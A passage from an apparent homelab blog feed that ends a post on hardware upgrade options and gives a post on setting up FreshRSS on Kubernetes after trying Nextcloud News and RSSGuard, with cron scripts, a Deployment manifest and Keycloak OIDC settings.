<p>It would be interesting to see what this option would do with my Homelab&rsquo;s power
consumption. I&rsquo;m currently at around 150 W. Replacing the H3 with a beefier machine
would increase the consumption, but at the same time, removing the 8 CM4 is also
going to do something. And by how much would the power consumption of the two
current Ceph hosts increase when they also need to run workloads besides Ceph?</p>
<p>One issue I would see here: The ability to reboot machines. I only ended up with
so many CM4 because I wanted the ability to reboot any physical host without
having to take down the Homelab. With only three machines providing both
the Ceph cluster and the rest of my workloads, could I take one of them down?</p>
<h3 id="moving-to-sff-machines-for-my-workers">Moving to SFF machines for my workers</h3>
<p>The last, and to me most interesting option: Do a bigger change. Replace the CM4
with SFF PCs, probably at least three of them. Here, again, the main point is
that I want to retain the ability to restart any physical host without having to
take down the entire Homelab beforehand.</p>
<p>The main appeal of this setup would be the chance to experiment a bit.
Instead of adding the bare hosts to my k8s cluster, I&rsquo;d want to install <a href="https://linuxcontainers.org/incus/">Incus</a>
and work with VMs. Mostly so that I&rsquo;ve got an easy way to experiment a bit,
without having to run the experimental VMs on my desktop. I very much enjoyed the
time when I was running VMs on my old home server while doing the k8s migration.</p>
<p>The costs are a bit unclear; judging from some quick searching, I would need to do a lot
more thinking and research to see what I can get at which price. I&rsquo;m also a bit
worried about both the power consumption and the noise levels. I will likely ask
around a bit on the Fediverse and see what other Homelabbers have to say on those
topics.</p>
<p>One big question with this option would be whether I would keep my three Pi 5
boards, which currently serve as k8s control plane nodes and run the Ceph MONs.
I could put one on each of the SFF PCs in a separate VM, for example.</p>
<h2 id="conclusions">Conclusions</h2>
<p>&#x1f937; I&rsquo;m honestly unsure at the moment. While I don&rsquo;t want to spend insane
amounts of money, the above cost estimates fall rather comfortably into the
&ldquo;eh, I can live with that&rdquo; bracket.</p>
<p>I don&rsquo;t think I will ultimately end up with option 1. Especially while playing
around with <a href="https://tinkerbell.org/">Tinkerbell</a>, I again got a bit annoyed
with the idiosyncrasies of ARM SBCs. I really want something conforming to
established standards for the next hardware iteration.</p>
<p>Option 2 would feel to me a bit too much like putting too many eggs into too
few baskets. I&rsquo;d gotten quite used to having my storage on separate hosts.
But then again, looking at the CPU utilization of those hosts, I&rsquo;m wasting a lot
of compute by not running more things on them.</p>
<p>Option 3 is my current favorite, to be honest. I&rsquo;d love to introduce something new
into the Homelab with Incus. Plus it would definitely introduce some interesting
challenges when it comes to my automated Homelab host OS update Ansible playbook.
&#x1f601;</p>
<p>We shall see. For now, the current Homelab is still fine. Plus, I&rsquo;m also planning
a networking upgrade that will likely happen first. But it was interesting to
think about, at least.</p>
]]></content:encoded>
    </item>
    <item>
      <title>FreshRSS: An RSS/Atom Feed Reader</title>
      <link>https://blog.mei-home.net/posts/freshrss/</link>
      <pubDate>Mon, 05 Jan 2026 22:15:49 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/freshrss/</guid>
      <description>I try Nextcloud News with RSSGuard as well as FreshRSS, ending on FreshRSS</description>
      <content:encoded><![CDATA[<p>Wherein I end up replacing my Brief setup for RSS with FreshRSS.</p>
<p>Over the holidays, I visited my family and only had my laptop with me. While I
have most things properly synced, my RSS feed subscriptions are not. Up to now,
I&rsquo;ve been using the <a href="https://addons.mozilla.org/de/firefox/addon/brief/">Brief Firefox extension</a>.
It looks like this:
<figure>
    <img loading="lazy" src="brief.png"
         alt="A screenshot of Brief&#39;s UI. On the left is the menu, with options for configuration, updating feeds and so on. Below that are menu entries for different views, showing all posts, only today&#39;s, bookmarked posts or trashed posts. Below that are all the blogs I&#39;m subscribed to, ranging from my own blog, over some corporate blogs like Turing Pi&#39;s to those of friends and acquaintances from the Fediverse. To the right of that menu are the current posts, divided into sections by publishing date. It&#39;s overall a very simple UI. The list of current posts only shows the headlines, no content."/> <figcaption>
            <p>Example of the Brief UI</p>
        </figcaption>
</figure>
</p>
<p>And it was fine. I really don&rsquo;t need much from an RSS reader. I don&rsquo;t tend to
read posts in my feed reader at all, it&rsquo;s really just an aggregator for me. When
the headline interests me, I read the article on the original page.</p>
<p>The big problem with Brief was that occasionally, I would be on the road,
and hence away from my desktop, without all of my blogs around to read.
Not having the current reading state of individual articles around isn&rsquo;t
<em>that</em> annoying. The bigger issue is that I also didn&rsquo;t have my
subscriptions synced between my desktop and laptop setups.</p>
<h2 id="nextcloud-news">Nextcloud News</h2>
<p>Writing a Fediverse post about my woes, <a href="https://transitory.social/@rachel">Rachel</a>
noted that Nextcloud has an RSS reader with <a href="https://apps.nextcloud.com/apps/news">Nextcloud News</a>,
which could save me some setup compared to standalone solutions like <a href="https://miniflux.app">Miniflux</a>.</p>
<p>The install is pretty simple, but I hit a problem due to the way I&rsquo;m handling
Nextcloud&rsquo;s cron. As I&rsquo;ve noted in my <a href="https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/">Nextcloud setup post</a>,
I&rsquo;m using the <a href="https://docs.nextcloud.com/server/stable/admin_manual/configuration_server/background_jobs_configuration.html#webcron">Webcron</a>
option, with a separate container which regularly hits the required endpoint and
triggers Nextcloud&rsquo;s background jobs. But this was a problem for the setup of
News. As per its docs, it cannot work with Webcron. That&rsquo;s because News has to
run the feed fetching via the cron setup, and remote content fetching can take
a while. So it&rsquo;s restricted to using a normal cron job. I took this chance to
finally dig deep enough into my setup to be able to use cron properly.</p>
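<p>For context, that Webcron container is nothing fancy. It boils down to a small
loop that hits <code>cron.php</code> over HTTP, roughly along these lines, with the
in-cluster URL as a placeholder:</p>
<pre tabindex="0"><code>#!/bin/bash

while true; do
  # trigger Nextcloud&#39;s background jobs via the webcron endpoint
  curl --silent --show-error &#34;http://nextcloud:8080/cron.php&#34;
  sleep &#34;${SLEEPTIME}&#34;
done
</code></pre>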
<p>But before I did so, I had a look at the cron option <a href="https://github.com/nextcloud/news-updater">offered by the News app</a>.
It&rsquo;s a Python script which does the feed updates. I disregarded this option
because it seems to require a Nextcloud admin account.</p>
<p>Next, I looked at options to run Nextcloud&rsquo;s cron with a real cron job. This is
famously complicated in a containerized setup, but Nextcloud provides an example
in <a href="https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/postgres/fpm/compose.yaml">their docker-compose</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nextcloud:fpm-alpine</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#ae81ff">always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">nextcloud:/var/www/html:z</span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># NOTE: The `volumes` config of the `cron` and `app` containers must match</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entrypoint</span>: <span style="color:#ae81ff">/cron.sh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis</span>
</span></span></code></pre></div><p>Reproducing this setup in Nextcloud&rsquo;s Pod resulted in this error:</p>
<pre tabindex="0"><code>crond: can&#39;t set groups: Operation not permitted
</code></pre><p>So I&rsquo;d have to run the container with <code>root</code> permissions. Instead of doing that,
I decided to just re-write my original web cron script a little bit:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>date<span style="color:#66d9ef">)</span><span style="color:#e6db74">: Launched task, sleeping for </span><span style="color:#e6db74">${</span>INITIAL_WAIT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>sleep <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>INITIAL_WAIT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> true; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  php -f /var/www/html/cron.php 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>date<span style="color:#66d9ef">)</span><span style="color:#e6db74">: Sleeping for </span><span style="color:#e6db74">${</span>SLEEPTIME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  sleep <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SLEEPTIME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>That container then got all of the mounts and env variables of my main Nextcloud
container, and now I&rsquo;ve got Nextcloud&rsquo;s background jobs running via this loop
script instead of Webcron.</p>
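<p>In my case that means an additional container running the script alongside the
main Nextcloud container. A minimal sketch of such a sidecar; the image tag, script
name and volume names are placeholders, and the real thing mirrors the env and
mounts of the main container:</p>
<pre tabindex="0"><code>containers:
  - name: nextcloud
    image: nextcloud:fpm   # placeholder tag
    # [...] the usual env and volumeMounts
  - name: cron
    image: nextcloud:fpm   # same image as the main container
    command: [&#34;bash&#34;, &#34;/cron-loop.sh&#34;]
    env:
      - name: INITIAL_WAIT
        value: &#34;120&#34;
      - name: SLEEPTIME
        value: &#34;300&#34;
      # [...] plus the env of the main Nextcloud container
    volumeMounts:
      - name: cron-script
        mountPath: /cron-loop.sh
        subPath: cron-loop.sh
      # [...] plus the mounts of the main Nextcloud container
</code></pre>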
<p>The web interface looks like this:</p>
<figure>
    <img loading="lazy" src="weird-sorting-youtube-folder.png"
         alt="A screenshot of Nextcloud New&#39;s web UI. At the top are the typical Nextcloud main menu options, e.g. dashboard or files or photos. In the main area on the left is a menu. At the top is a large &#39;subscribe&#39; button for adding new feeds. Below it is a button for new folders. After that come the different views for feeds. At the top is one with all unread articles. Then one for all articles, followed by &#39;viewed last&#39; and then &#39;bookmarked&#39;. Then come my subscribed feeds, sorted by folders. The selected feed is the &#39;YouTube&#39; folder, showing 133 unread items. To the right of the menu is the main area, showing a list of articles. Or rather, in this particular case, YouTube videos. One important thing to note is that the list only contains the video&#39;s titles, but not which feed it is coming from. Another important thing is that videos are not sorted by publishing date, as videos published on October 24th are directly followed by videos from 6 days ago or yesterday. Those in turn are then followed by videos from November 17th and three weeks ago."/> <figcaption>
            <p>Example of the Nextcloud News UI.</p>
        </figcaption>
</figure>

<p>There are two things I didn&rsquo;t really like. One is that the feed an article is
coming from isn&rsquo;t shown in the list. That should not matter too much for most use
cases, because the favicon is still shown. But starting to use YouTube&rsquo;s RSS feeds
was one of the things I wanted to do, and of course all of those feeds would
just have YouTube&rsquo;s favicon.</p>
<p>Also note the order of the videos. They&rsquo;re not ordered purely by publishing date.
Instead, the order seems to be first by feed, and only then by publishing date.
Which for me ruins the usability of combined feeds like the YouTube folder here.
This is a <a href="https://github.com/nextcloud/news/issues/2626">known issue</a>, and seems
to be related to the architecture of the News app if I&rsquo;m reading the issue&rsquo;s
comments correctly.</p>
<p>At the same time, those two problems seemed to be only related to the UI. So I
decided to look around for a desktop client for RSS. I ultimately landed on
<a href="https://github.com/martinrotter/rssguard">RSSGuard</a>.</p>
<p>It works nicely with Nextcloud News and can properly sync feeds and the read/unread
state of articles. One thing I&rsquo;m not sure about, and it might just be me being a bit
incompetent: adding feeds did not seem to be possible from within RSSGuard, only
via the News web interface.</p>
<p>RSSGuard looks like this:</p>
<figure>
    <img loading="lazy" src="rss-guard.png"
         alt="A screenshot of RSSGuard. Its UI has a similar layout as Nextcloud News. On the left is a list of the feeds I&#39;m subscribed to, sorted into folders. They&#39;re arranged under my Nextcloud account, indicating that RSSGuard supports multiple feed aggregator accounts. On the right is the lift of articles. It shows the title, author and a date. In this case, the screenshot shows the Practical Engineering YouTube channel&#39;s recent videos. Arranged along the top are buttons for bookmarking an article, as well as marking it read/unread."/> <figcaption>
            <p>Example of RSSGuard</p>
        </figcaption>
</figure>

<p>I liked this interface a bit better than News&rsquo; web UI. The main issue here was
that I don&rsquo;t really like separate apps for things these days. For most things,
I&rsquo;d rather have a nice web interface.</p>
<p>In addition, I also realized another annoying thing about Nextcloud News. It seems
that it uses the &ldquo;Last updated&rdquo; date for article dates, not the published date.
Take for example the topmost video in the
above screenshot. It&rsquo;s <a href="https://www.youtube.com/watch?v=3nDdLiXS5wk">this one</a>.
The date shown by both Nextcloud News and RSSGuard is 2025-12-24. But the
video was actually published on 2025-10-07. I looked around a lot, and couldn&rsquo;t
find an option to switch to always using the publishing date, not the date the
article was last updated.</p>
<p>This finally put me off Nextcloud News.</p>
<h2 id="freshrss">FreshRSS</h2>
<p>Looking at other options, I finally decided on <a href="https://freshrss.org/index.html">FreshRSS</a>.</p>
<p>It&rsquo;s written in PHP and provides a container image for deployments out of the
box. It also supports OIDC for SSO and works nicely with my Keycloak instance.
For data storage, it supports all the mainstream databases, including MySQL, PostgreSQL
and SQLite. As I&rsquo;m not foreseeing much load, I decided on staying with SQLite.
Besides the database, it also needs some space for stuff like cached favicons.</p>
<p>The container already comes with an Apache instance, so no further web server
for delivering static assets is required. The container also comes with a cron
daemon, so there&rsquo;s no need for setting up a separate process for triggering the
feed update.</p>
<p>The setup in my Kubernetes cluster was pretty straightforward, so I will only
provide the Deployment manifest here:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">freshrss/freshrss:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/FreshRSS/data</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/www/FreshRSS/extensions</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">subPath</span>: <span style="color:#ae81ff">extensions</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TZ</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CRON_MIN</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;2,32&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">LISTEN</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0.0.0.0:8080&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FRESHRSS_ENV</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;production&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># My main Traefik instance as well as my k8s Pod CIDR</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TRUSTED_PROXY</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;10.1.1.1 10.2.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_ENABLED</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_PROVIDER_METADATA_URL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;https://login.example.com/realms/example/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_REMOTE_USER_CLAIM</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_SCOPES</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;openid profile&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_X_FORWARDED_HEADERS</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;X-Forwarded-Host X-Forwarded-Port X-Forwarded-Proto&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_ID</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">id</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_SECRET</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">OIDC_CLIENT_CRYPTO_KEY</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-encrypt-key</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">freshrss</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">freshrss-volume</span>
</span></span></code></pre></div><p>Similar to what I wrote above about Nextcloud and cron, the FreshRSS container
needs to run as root because it runs a cron daemon. The Apache instance drops
privileges, though, and runs as the <code>www-data</code> user with UID 33.</p>
<p>The <code>CRON_MIN</code> variable configures the feed update cron job to run
every 30 minutes, at hh:02 and hh:32.</p>
<p>Upon first visiting the FreshRSS URL, it shows a few setup pages for
configuring the initial user/admin account and the database. When using OIDC for
authentication, some care has to be taken: the username for the new user needs
to be the same as the OIDC username. The relevant docs can be found <a href="https://freshrss.github.io/FreshRSS/en/admins/16_OpenID-Connect.html">here</a>.
The password provided on the page is not relevant, as it won&rsquo;t be used when
OIDC auth is enabled.</p>
<p>As Keycloak is not among the documented OIDC providers in the FreshRSS docs,
here is a short overview of the config which worked for me for configuring the
client in Keycloak:</p>
<ul>
<li><em>Root URL:</em> <a href="https://freshrss.example.com">https://freshrss.example.com</a></li>
<li><em>Home URL:</em> <a href="https://freshrss.example.com">https://freshrss.example.com</a></li>
<li><em>Valid Redirect URIs:</em> <a href="https://freshrss.example.com:443/i/oidc">https://freshrss.example.com:443/i/oidc</a>*
<ul>
<li>Weirdly enough, the port is necessary here, as the FreshRSS container
provides the redirect URL exactly like this. Without the port, Keycloak will
reject the request.</li>
</ul>
</li>
<li><em>Valid post logout redirect URIs:</em> <a href="https://freshrss.example.com/">https://freshrss.example.com/</a>*</li>
<li><em>Web origins:</em> <a href="https://freshrss.mei-home.net">https://freshrss.mei-home.net</a></li>
<li><em>Client Authentication:</em> On</li>
<li><em>Authorization:</em> Off</li>
<li><em>Standard Flow:</em> On</li>
<li>All other check boxes off</li>
</ul>
<h2 id="adding-feeds">Adding Feeds</h2>
<p>Once the install was complete, I could start adding feeds. This is what FreshRSS'
UI looks like:</p>
<figure>
    <img loading="lazy" src="freshrss-ui.png"
         alt="A screenshot of FreshRSS&#39; web UI. It is split into two parts, a menu with the feeds on the left, and the main area with the currently selected feeds on the right. At the top of the menu on the left is a big button for subscription management and adding feeds. Below it are several views of the available feeds. At the top is a &#39;Main stream&#39;, which shows ten unread articles via a number next to it. Below it are important feeds and favourited articles, both without content at the moment. Below is the &#39;Uncategorized&#39; category. It contains one feed, called &#39;FreshRSS releases&#39;, also showing 10 unread articles. This feed is currently selected. At the top of the main area on the right are some buttons. The first two allow switching between showing unread or already read articles. Next come two buttons for showing favourited or un-favourited articles. Then comes a button for choosing configurable user-quieries. Next is a dropdown menu with some actions for the whole feed: Marking all articles as read, and marking articles older than one day or older than one week as read. Finally , there are buttons for changing the main view to a more or less detailed view. And finally, there&#39;s a button for manually triggering an update for the specific feed. The main area contains the list of articles. At the top of the list is a line saying &#39;Received today -- 4 January 2026&#39;. Each line first contains a button to mark the article as read/unread and the another one for favouriting the article. Next comes the name of the feed, which is also a link for opening that feed in FreshRSS. Next comes the article&#39;s headline. In this case, it&#39;s the subject line of the GitHub release, e.g. &#39;FreshRSS 1.26.2&#39;. Finally follows the publishing date of the article and a button to open the article on the original page. Below the list of articles is a short note that there are no more articles, followed by a very big button which will mark all articles as read and jump to the next unread sibling feed."/> <figcaption>
            <p>Example of the brief UI right after finishing the setup.</p>
        </figcaption>
</figure>

<p>The &ldquo;FreshRSS releases&rdquo; feed is the GitHub releases RSS feed for FreshRSS itself,
which is added by default for all new users.</p>
<p>Note the &ldquo;Received today &ndash; 4 January 2026&rdquo; line at the top. I don&rsquo;t like
this much, as I don&rsquo;t care when an article was fetched, but rather when it was
published. This can be changed via a dropdown:</p>
<figure>
    <img loading="lazy" src="freshrss-sorted-publishing.png"
         alt="The same view as before. But now, the menu for setting up the view is expanded at the top, showing a number of options for changing how the article list is shown. It allows sorting by a number of characteristics, e.g. by publication date, user modified date, content length, lexically by the full link, by title, by the feed&#39;s title, and even in random order. The publication date option is selected in the screenshot. The effect on the article list is that now, instead of just one headline saying &#39;Received today -- 4 January 2026&#39;, there is now one headline for every day with a release. E.g. there&#39;s now a headline &#39;Published -- 3 June 2025&#39;, with the article for the FreshRSS 1.26.3 release below it."/> <figcaption>
            <p>Switching to sorting the posts by publication date.</p>
        </figcaption>
</figure>

<p>Adding a new feed works through the &ldquo;+&rdquo; at the top of the menu. It leads
to this form:
<figure>
    <img loading="lazy" src="freshrss-add-feed.png"
         alt="A screenshot of FreshRSS&#39; subscription management UI. On the left is a menu again, providing access to Subscription management, label management, import/export of data as well as some statistics. It also has a menu item called &#39;Add a feed or category&#39;, which is currently selected. In the main area on the right are multiple forms. The first one is headed &#39;Add a category&#39;, which contains a single field labeled &#39;category&#39; and a button labeled &#39;Add&#39; below it. Next comes the &#39;Add a feed&#39; form. IT has a field labeled &#39;Feed URL&#39;. Then comes a dropdown to chose the category the new feed should be sorted into. That&#39;s followed by two hidden sections with additional config options, labeled &#39;Type of feed source&#39; and &#39;Advanced&#39;. Below that is another &#39;Add&#39; button. Finally, there is the &#39;Add dynamic OPML&#39; form. It has two fields, the first one labeled &#39;OPML category name&#39; and second one called &#39;OPML URL&#39;. That&#39;s again followed by an &#39;Add&#39; button."/> <figcaption>
            <p>The feed and category addition UI.</p>
        </figcaption>
</figure>
</p>
<p>In the &lsquo;Add a feed&rsquo; form, the &lsquo;Feed URL&rsquo; doesn&rsquo;t need to be the full URL of the
feed&rsquo;s XML file. FreshRSS can scan for the typical RSS links. E.g. when entering
my blog&rsquo;s home page into the field, it has no problem finding the
correct RSS URL at <a href="https://blog.mei-home.net/index.xml">https://blog.mei-home.net/index.xml</a>.</p>
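<p>This discovery presumably works via the usual RSS autodiscovery <code>&lt;link&gt;</code> element
in the page&rsquo;s HTML head. As a quick, hedged check (assuming the theme emits that
element, as Hugo themes typically do), you can look for it with curl:</p>
<pre tabindex="0"><code>curl -s https://blog.mei-home.net/ | grep -i &#39;application/rss+xml&#39;
# expected to show something like:
# &lt;link rel=&#34;alternate&#34; type=&#34;application/rss+xml&#34; href=&#34;https://blog.mei-home.net/index.xml&#34; ...&gt;
</code></pre>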
<p>The &ldquo;Type of feed source&rdquo; section contains options which allow scraping a
website that doesn&rsquo;t provide an RSS feed and adding it to FreshRSS,
but I haven&rsquo;t tried that myself.</p>
<p>The &ldquo;Advanced&rdquo; section contains further options, like setting additional
headers to be sent while fetching the feed or setting credentials for auth.</p>
<p>I don&rsquo;t want to make this post any longer than it is already going to be, so I
will provide all the sites I subscribe to in a follow-up. But I wanted to note
two things. First, GitHub provides RSS feeds on the release pages of projects,
as the FreshRSS feed already demonstrates.
Second, I&rsquo;m also using YouTube&rsquo;s feeds. YouTube provides an RSS feed per channel, and
I&rsquo;m now using that instead of YouTube&rsquo;s subscriptions page. The one thing I&rsquo;m
missing is the video durations. E.g. when cooking, I like to put on a longer
video to listen to. But I can&rsquo;t see the durations in FreshRSS, as they&rsquo;re not
provided as part of the RSS feeds.
Another annoying thing is that the feeds cannot be filtered to only proper videos.
You also get the shorts when subscribing to a channel. This annoys me a bit,
but luckily most of the channels I&rsquo;m following don&rsquo;t do a lot of shorts. I&rsquo;m
also going to have a look at FreshRSS&rsquo; filtering functionality. I&rsquo;m pretty sure
that it should be possible to filter the shorts via that feature.</p>
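<p>For reference, the per-channel feed URL has this form, with <code>CHANNEL_ID</code> being a
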